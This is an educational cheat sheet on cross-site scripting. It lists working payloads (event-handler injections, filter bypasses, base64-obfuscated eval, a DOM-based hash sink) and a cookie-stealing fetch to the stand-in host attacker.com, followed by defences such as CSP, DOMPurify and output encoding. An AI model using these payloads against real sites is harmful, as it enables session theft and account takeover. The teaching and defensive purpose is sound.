Cross site scripting

Most common types: reflected (the payload comes from the current request and is echoed straight back), stored (the payload is persisted server-side and served to other users later), DOM-based (client-side JavaScript writes attacker-controlled data such as location.hash into a dangerous sink, so the server never sees the payload and server-side filtering cannot help).

Some general payloads:

```html
<!-- test -->
<script>alert('XSS')</script>

<!-- html events: run without a <script> tag, so they also defeat filters that only strip script tags -->
<img src="x" onerror="alert('XSS')">
<body onload="alert('XSS')">
<svg onload="alert('XSS')">

<!-- Bypassing filters -->
<ScRiPt>alert('XSS')</sCriPt> <!-- Mixed case: tag names are case-insensitive, a case-sensitive blocklist is not -->
<img src=x onerror="&#97;lert('XSS')"> <!-- HTML entity encoding: the parser decodes entities in attribute values before the JS engine sees the handler, so this still runs -->
<iframe src="javascript:alert('XSS')"></iframe> <!-- JavaScript in a URL attribute: entity-encoding the value does not stop a javascript: scheme -->

<!-- Stealing cookies -->
<script>
  // Only cookies without the HttpOnly flag are readable here. The cross-origin request
  // is still sent even though CORS blocks reading the response, so exfiltration does not
  // need CORS. A CSP with default-src 'self' (and no permissive connect-src) blocks this fetch.
  fetch('https://attacker.com/steal?data=' + document.cookie);
</script>

<!-- dom-based xss -->
<script>
  // If the URL is https://site.com/page#<img src=x onerror=alert('XSS')>
  // Whether "<" reaches location.hash raw or percent-encoded is browser-dependent;
  // real-world sinks often pass it through decodeURIComponent() first, which makes the payload reliable.
  var payload = document.location.hash.substring(1);
  document.write(payload); // Unsafe DOM write: the fragment never leaves the browser, so only client-side fixes help
</script>

<!-- advanced obfuscation -->
<script>
  eval(atob('ZG9jdW1lbnQud3JpdGUoIjxpbWcgc3JjPXggb25lcnJvcj1hbGVydCgxKT4iKQ=='));
  // Decodes to: document.write("<img src=x onerror=alert(1)>")
  // Hides the keywords from a server-side filter; a CSP without 'unsafe-eval' blocks the eval() call itself
</script>
```

Protection

Libs that can help

  • DOMPurify: sanitizes an untrusted HTML string (allowlist-based) so it can go into innerHTML when you must render user-supplied markup rather than plain text. Keep it updated; parser-differential bypasses are found and fixed regularly.

Best practices code

  • Restrict with CSP: Content-Security-Policy: default-src 'self'; script-src 'self' https://trusted-cdn.com;
    • Blocks inline scripts and inline event handlers because 'unsafe-inline' is absent, and blocks eval() because 'unsafe-eval' is absent
    • Allowing a whole host such as a CDN is a known weak spot: a JSONP endpoint or an old AngularJS build on that host can be used to run attacker-controlled code. Prefer per-response nonces or hashes with 'strict-dynamic' over host allowlists.
  • Avoid unsafe sinks: innerHTML/outerHTML, document.write(), eval(), and setTimeout()/setInterval() called with a string argument. Put data into the DOM with textContent or createElement()/setAttribute() instead.
  • Encode for the output context, not just once: HTML entities (including &) for text and attribute values, \uXXXX escapes for values inside JavaScript string literals, and a scheme allowlist for href/src, because entity encoding does not neutralise a javascript: URL.
  • Some common XSS defense headers:
Content-Security-Policy: default-src 'self'
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
    • X-XSS-Protection is legacy: the browser filter it controlled has been removed from Chromium-based browsers and was never implemented in Firefox, so do not rely on it. CSP is the real control.
  • d